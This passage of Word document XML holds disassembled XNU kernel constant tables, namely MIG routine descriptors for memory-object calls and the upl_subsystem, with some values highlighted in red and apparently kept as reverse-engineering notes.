        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7DCh </w:t>
      </w:r>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 840h                 ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04540                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq offset _Xmemory_object_get_attributes; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 4                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 48h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 3AFC8000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 4                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 2Ch                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 3AFE00h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 5                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 2C00000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04540                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 3AFF70h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 0AFFFFFF80h          ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dq 38h                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRDefault="008A3F20" w:rsidP="00F07003">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pl_subsystem</w:t>
      </w:r>
      <w:r w:rsidR="00F07003">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 public upl_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788 ; const upl_subsystem upl_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788 upl_subsystem_0 dq offset upl_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                                         ; DATA XREF: upl_server_routine:loc_FFFFFF80003B18B2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                                         ; upl_server+80o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 802h</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04788                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>806h</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 30h                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq offset _Xupl_abort   ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 2                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04788                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 3B1A4000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 5                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 db 30h, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 30h                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 3B1C00h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
